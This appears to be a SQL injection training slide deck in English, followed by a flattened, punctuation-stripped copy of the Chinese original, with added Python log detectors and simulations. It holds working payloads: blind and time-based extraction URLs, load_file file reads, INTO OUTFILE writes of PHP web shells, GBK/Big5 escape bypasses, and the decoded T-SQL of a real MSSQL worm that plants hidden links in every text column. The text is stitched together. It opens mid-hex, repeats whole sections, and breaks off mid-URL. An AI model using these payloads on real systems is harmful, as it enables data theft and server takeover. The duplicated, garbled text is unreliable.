203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  – first request: in every text column wider than 10 characters, cut off any existing tail starting at </title><
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  – second request: widen every text column wider than 20 characters to varchar(8000) NOT NULL so that the next payload fits
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  – third request: append a hidden (clipped) <div> linking to http://116jurist.ru to every text column wider than 80 characters; the link text is the cp1251-encoded string юридические-услуги-москва
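The following Python example is added here and is not part of the original slides. From the defender's side it covers the request patterns shown in this deck in one place: the BENCHMARK/SLEEP timing probes of the time-based blind slides, the CHAR()/0x-encoded load_file() paths of the escape-bypass slides, and the cast(0x...)+exec(@s) wrapper of the 116jurist.ru case, whose hex body it decodes so an analyst can read it. The log lines, field layout, rule names, regular expressions and latency threshold are this example's own constructions, not the deck's.

```python
# Added example, not from the original slides: a log-side detector for the
# request patterns shown on these slides: timing probes (SLEEP/BENCHMARK),
# CHAR()/0x-encoded file access, and the hex-wrapped T-SQL of the
# 116jurist.ru case, whose cast(0x...) body is decoded so an analyst can read
# it. The log lines are constructed for the demo; the rules, field layout and
# latency threshold are this example's own choices, not the original deck's.
import re
from urllib.parse import unquote_plus

# Constructed access-log lines: "<client> <method> <path?query> <status> <bytes> <seconds>"
LOG_LINES = [
    "198.51.100.7 GET /getUser.php?id=1 200 512 0.012",
    "198.51.100.7 GET /getUser.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),"
    "BENCHMARK(5000000,ENCODE(%27a%27,%27b%27)),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb"
    " 200 512 5.8",
    "203.0.113.9 GET /getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,"
    "load_file(0x443A5C636F6E6669672E706870)-- 200 2048 0.020",
    "192.0.2.33 GET /news.asp?Serno=51+declare+@s+varchar(8000)+set+@s=cast("
    "0x73657420616e73695f7761726e696e6773206f6666204445434c41524520405420564152434841522832353529"
    "+as+varchar(8000))+exec(@s)-- 200 300 0.300",
]

RULES = [
    ("time_based_probe", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file_access", re.compile(r"\b(load_file\s*\(|into\s+outfile\b)", re.I)),
    ("encoded_literal", re.compile(r"0x[0-9a-f]{8,}|\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I)),
    ("hex_wrapped_exec", re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+varchar", re.I)),
]
SLOW_SECONDS = 3.0  # a timing probe is only meaningful together with a slow response


def decode_hex_literals(query: str) -> list:
    """Decode every 0x... literal of even length as latin-1 text so that
    hex-obfuscated paths and SQL bodies become readable in the alert."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]+)", query):
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("latin-1"))
    return out


def analyse_line(line: str) -> dict:
    """Parse one constructed log line, URL-decode the query string and run
    the rules over it."""
    client, _method, target, _status, _size, seconds = line.split()
    path, _, raw_query = target.partition("?")
    query = unquote_plus(raw_query)  # '+' -> space, %27 -> quote, etc.
    hits = [name for name, rx in RULES if rx.search(query)]
    if "time_based_probe" in hits and float(seconds) >= SLOW_SECONDS:
        hits.append("slow_response")
    return {"client": client, "path": path, "hits": hits,
            "decoded": decode_hex_literals(query) if hits else []}


def analyse(lines) -> list:
    """Return only the lines that tripped at least one rule."""
    return [r for r in map(analyse_line, lines) if r["hits"]]


if __name__ == "__main__":
    for alert in analyse(LOG_LINES):
        print(alert)
```

The decode step matters most for the MSSQL case: the request itself looks like an opaque hex blob, but the decoded body immediately shows the cursor over INFORMATION_SCHEMA.columns, which is what distinguishes a mass-injection worm from an ordinary probe. Pairing the timing rule with the measured response time keeps BENCHMARK() matches in ordinary application traffic from paging anyone.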
References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL 5.1 Reference Manual, String Functions
• MySQL 5.1 Reference Manual, Miscellaneous Functions
• MySQL/PHP: generating a one-line shell with load_file/outfile when single quotes are escaped (MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection Techniques – guessing data
• Obtain the length
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7
• Guess the data one character at a time
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'
SQL Injection Techniques – reading and writing files
• Read data and write it to a file
  – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:\Website\www.hackdemo.com\member.txt'
• Write a backdoor
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+into+outfile+'D:\Website\www.hackdemo.com\cmd.php'
With escaping added and error messages turned off, is it safe now?
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - using heavy queries (2/2)
Time-Based Blind SQL Injection - guessing the database name through time delays
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
SQL Injection attack techniques - bypassing escaped characters
• ASCII encoding
– ASCII(), CHAR()
– Single character
• CHAR(68)
– Multiple characters
• CHAR(68, 58, 92)
• Hexadecimal encoding
– HEX()
– 0x443A5C
• Double-byte escape technique
SQL Injection attack techniques - guessing data (escape bypass)
• Guessing columns
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guessing column data
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
– …
– http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection attack techniques - reading data (escape bypass)
• Reading data, writing files
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
– http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
– (The char(...) and 0x... arguments above encode D:\Website\www.hackdemo.com\getUser.php and D:\Website\www.hackdemo.com\config.php respectively, so the path needs no quote characters at all.)
SQL Injection attack techniques – writing files (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Remote MySQL
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a is:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written is:
<?php @eval($_POST['cmd']);?>
SQL Injection attack techniques - double-byte escape technique (1/3)
• The injected encoding recombines with the backslash (0x5C) into one character, bypassing the escape-character restriction
• Scenario
– Escape handling by
• addslashes
• mysql_escape_string
• php.ini
– magic_quotes_gpc enabled
– BIG5 or GBK encoding in use
• set names gbk / set names big5
SQL Injection attack techniques - double-byte escape technique (2/3)
• Chinese text is represented by two bytes
– Big5
• High byte 0x81-0xFE, low byte 0x40-0x7E and 0xA1-0xFE
– GBK
• Lead byte 0x81-0xFE, trail byte 0x40-0x7E
– GB2312
• Lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
– Attack characters: BF, CC, D5…
SQL Injection attack techniques - double-byte escape technique (3/3)
• Escape bypass on a quoted parameter
– http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4,'23
– http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4,'23
– http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4,'23
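An added example, not from the slides, that simulates the mechanism of the three double-byte slides above: a byte-wise escaper like addslashes() feeding a server that decodes the query as GBK or Big5, beside the charset-aware escaping that a correctly configured mysql_real_escape_string() performs (that function is not named on the slides; it and the query shape, table name and payloads are assumptions of this example).

```python
# Added example (not from the slides): why addslashes()-style escaping fails
# under SET NAMES gbk / big5, and what charset-aware escaping changes.

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): backslash before ' " \\ NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def charset_aware_escape(data: bytes, charset: str) -> bytes:
    """Escape after decoding with the connection charset (what
    mysql_real_escape_string() does when the client charset matches the
    connection): a lone lead byte is a decode error, not a character."""
    text = data.decode(charset)  # strict: raises on malformed input
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode(charset)


def sql_outside_strings(text: str) -> str:
    """Return the parts of decoded SQL text that lie outside single-quoted
    literals, honouring backslash escapes inside literals as MySQL does."""
    out, in_str, i = [], False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 2  # escaped character: skip it
                continue
            if c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injection_succeeds(name_param: bytes, charset: str, hardened: bool = False) -> bool:
    """Build the (assumed) searchUser query around the escaped parameter,
    decode it the way a server with SET NAMES <charset> would, and report
    whether UNION ended up outside every string literal."""
    try:
        escaped = charset_aware_escape(name_param, charset) if hardened else addslashes(name_param)
    except UnicodeDecodeError:
        return False  # the hardened path rejects the malformed input outright
    query = b"SELECT * FROM member WHERE name='" + escaped + b"'"
    decoded = query.decode(charset, errors="replace")
    return "UNION" in sql_outside_strings(decoded).upper()


# Constructed payloads in the shape the slides show: lead byte, quote, UNION.
PAYLOAD_GBK = b"h\xbf' AND 1=2 UNION SELECT 1,2,3,4,'23"   # 0xBF 0x5C is one GBK character
PAYLOAD_BIG5 = b"h\xa5' AND 1=2 UNION SELECT 1,2,3,4,'23"  # 0xA5 0x5C is one Big5 character

if __name__ == "__main__":
    for charset, payload in (("gbk", PAYLOAD_GBK), ("big5", PAYLOAD_BIG5), ("utf-8", PAYLOAD_GBK)):
        print(f"{charset:6} addslashes: {injection_succeeds(payload, charset)}"
              f"  charset-aware: {injection_succeeds(payload, charset, hardened=True)}")
```

With UTF-8 the lone lead byte decodes to a replacement character and the backslash survives, which is the reason the deck recommends UTF-8 over BIG5/GBK.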
SQL Column Truncation – introduction (1/3)
• SQL mode in MySQL
– STRICT_ALL_TABLES not enabled
• Inserting data longer than the column produces a warning
• but the row is still inserted
– STRICT_ALL_TABLES enabled
• Inserting data longer than the column produces a message
• ERROR 1406 is raised and the row is not inserted
• Disaster
– 2008-09-07
• WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - effect (2/3)
SQL Column Truncation - defences (3/3)
• Actively strip whitespace from strings that should never contain it
– e.g. account names
• Add BINARY when SELECTing the data
• Configure MySQL to compare with BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
– Data exceeding the column length raises an ERROR instead of a WARNING
– To avoid errors on insert, extra checks may be needed on insert and update
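An added example, not from the slides, that simulates the MySQL behaviour behind the column-truncation slides and then applies the deck's defences one at a time. The column width, the rows, the e-mail addresses and the registration/reset flow are constructed for the demo; the strict and non-strict rules follow the slides.

```python
# Added example (not from the slides): SQL Column Truncation simulated, with
# the deck's defences (strip whitespace, BINARY comparison, STRICT_ALL_TABLES).

COLUMN_WIDTH = 16  # assumed VARCHAR(16) login column


class DataTooLong(Exception):
    """Stands in for MySQL ERROR 1406 under STRICT_ALL_TABLES."""


def mysql_equal(a: str, b: str, binary: bool = False) -> bool:
    """Non-binary VARCHAR comparison ignores trailing spaces (PAD SPACE) and
    case; BINARY compares the exact bytes, which is the slides' SELECT fix."""
    if binary:
        return a == b
    return a.rstrip(" ").lower() == b.rstrip(" ").lower()


def find_users(rows: list[dict], login: str, binary: bool = False) -> list[dict]:
    return [r for r in rows if mysql_equal(r["login"], login, binary)]


def register(rows: list[dict], login: str, email: str, *, strict: bool = False,
             clean: bool = False) -> bool:
    """Registration flow: uniqueness check, then INSERT. True when a row was stored."""
    if clean:
        # Account names never legitimately contain whitespace: strip it and
        # enforce the column width in the application, as the slides advise.
        login = "".join(login.split())
        if len(login) > COLUMN_WIDTH:
            raise ValueError("login too long")
    if find_users(rows, login):
        return False  # "that username is already taken"
    if len(login) > COLUMN_WIDTH:
        if strict:
            raise DataTooLong("Data too long for column 'login'")  # ERROR 1406
        login = login[:COLUMN_WIDTH]  # non-strict: only a warning, truncated row stored
    rows.append({"login": login, "email": email})
    return True


def reset_mail_targets(rows: list[dict], login: str, binary: bool = False) -> list[str]:
    """Which addresses receive the password-reset mail for this login?"""
    return [r["email"] for r in find_users(rows, login, binary)]


def demo(*, strict: bool = False, clean: bool = False, binary: bool = False) -> list[str]:
    rows = [{"login": "admin", "email": "admin@example.invalid"}]  # constructed
    # 17 characters: differs from "admin" at registration time, but the
    # stored, truncated value is "admin" padded with spaces.
    rogue = "admin" + " " * 11 + "x"
    try:
        register(rows, rogue, "attacker@example.invalid", strict=strict, clean=clean)
    except (DataTooLong, ValueError):
        pass  # the insert was refused
    return reset_mail_targets(rows, "admin", binary)


if __name__ == "__main__":
    print("vulnerable:        ", demo())
    print("STRICT_ALL_TABLES: ", demo(strict=True))
    print("whitespace removed:", demo(clean=True))
    print("BINARY comparison: ", demo(binary=True))
```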
SQL Injection – further thoughts
• Can attacks happen through INSERT and UPDATE?
• Does NoSQL have no SQL Injection?
• Other exploitation
– Deep Blind Injection
– Error-Based Injection
• Duplicate Error
• Function
– information_schema
– User-Defined Functions
– Triggers
SQL Injection – automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid BIG5 and GBK
• Check data types and cast explicitly
– bool settype(mixed &$var, string $type)
– intval, doubleval
• Use safe functions
– OWASP ESAPI
• MySQLCodec
MSSQL real-world case - automated injection from 116jurist.ru (1/4)
• 2012-12-xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x… +as+varchar(8000))+exec(@s)-- (hex literal omitted; decoded in (4/4))
MSSQL real-world case - automated injection from 116jurist.ru (2/4)
• 2012-12-xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x… +as+varchar(8000))+exec(@s)-- (hex literal omitted; decoded in (4/4))
MSSQL real-world case - automated injection from 116jurist.ru (3/4)
• 2012-12-xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x… +as+varchar(8000))+exec(@s)-- (hex literal omitted; decoded in (4/4))
MSSQL real-world case - automated injection from 116jurist.ru, decoded (4/4)
The three requests decode to the following T-SQL, in order: (1) cut every text column wider than 10 back to whatever precedes an earlier injected </title><, (2) widen every text column wider than 20 to varchar(8000), (3) append the hidden 116jurist.ru link to every text column wider than 80.
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
(The link text is cp1251-encoded Cyrillic in the original payload.)
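An added example, not from the slides, of the detection side of the request shapes shown earlier in the deck: the BENCHMARK-based blind-injection URLs, the load_file() reads with CHAR()/0x-encoded paths, and the cast(0x...)+exec(@s) wrapper of the 116jurist.ru case above. The log lines, the paths and the hex-wrapped T-SQL are constructed for the demo, not taken from the incident.

```python
# Added example (not from the slides): flag the injection shapes the deck
# shows in web-server access logs, including T-SQL hidden inside a 0x literal.
import re
from urllib.parse import unquote_plus

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{8,})")

# Each rule is (label, pattern applied to the URL-decoded query string).
RULES = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\b(benchmark|sleep)\s*\(", re.I)),
    ("file-access", re.compile(r"load_file\s*\(|into\s+(out|dump)file", re.I)),
    ("char-encoded", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+){3,}", re.I)),
    ("cast-exec", re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar.{0,40}exec\s*\(", re.I | re.S)),
]
# Markers of the cursor-driven mass UPDATE that appear once the hex is decoded.
TSQL_MARKERS = re.compile(r"information_schema|declare\s+\w+\s+cursor|@@fetch_status|exec\s*\(", re.I)


def decode_hex_literals(text: str) -> list[str]:
    """Decode every 0x... literal long enough to hide text (the deck's payloads
    used this for file paths and for an entire T-SQL batch)."""
    found = []
    for m in HEX_LITERAL.finditer(text):
        digits = m.group(1)
        if len(digits) % 2 == 0:
            found.append(bytes.fromhex(digits).decode("latin-1"))
    return found


def analyze(query_string: str) -> list[str]:
    """Return the labels of every rule that fires for one query string."""
    decoded = unquote_plus(query_string)
    flags = [label for label, rx in RULES if rx.search(decoded)]
    if any(TSQL_MARKERS.search(inner) for inner in decode_hex_literals(decoded)):
        flags.append("hex-hidden-tsql")
    return flags


def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """(1-based line number, path, flags) for every flagged request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        flags = analyze(query)
        if flags:
            hits.append((lineno, path, flags))
    return hits


# Constructed T-SQL in the shape of the decoded (4/4) slide, hex-wrapped the
# way the (1/4)-(3/4) requests were; all log lines below are constructed.
FAKE_TSQL = ("DECLARE @T VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select TABLE_NAME "
             "from INFORMATION_SCHEMA.tables OPEN Table_Cursor FETCH NEXT FROM Table_Cursor "
             "INTO @T EXEC('UPDATE ['+@T+'] SET c=c') CLOSE Table_Cursor")
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Mar/2013:10:03:31 +0800] "GET /getUser.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [07/Mar/2013:10:03:32 +0800] "GET /getUserLash.php?id=1+UNION+SELECT+'
    'IF(1=1,BENCHMARK(5000000,MD5(1)),NULL),2,3,4 HTTP/1.1" 200 40',
    '10.0.0.5 - - [07/Mar/2013:10:03:33 +0800] "GET /getUserLash.php?id=1+AND+1=2+UNION+'
    'SELECT+1,2,3,load_file(0x2F6574632F686F73746E616D65)-- HTTP/1.1" 200 64',
    '10.0.0.9 - - [07/Mar/2013:10:03:44 +0800] "GET /page.asp?Serno=51+declare+@s+varchar(8000)'
    '+set+@s=cast(0x' + FAKE_TSQL.encode().hex() + '+as+varchar(8000))+exec(@s)-- HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for lineno, path, flags in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {path} -> {', '.join(flags)}")
```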
References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (Traditional Chinese edition of 白帽子讲Web安全), 2012
• MySQL String Functions (5.1)
• MySQL Miscellaneous Functions (5.1)
• MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话 (Chinese article on writing a one-line shell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
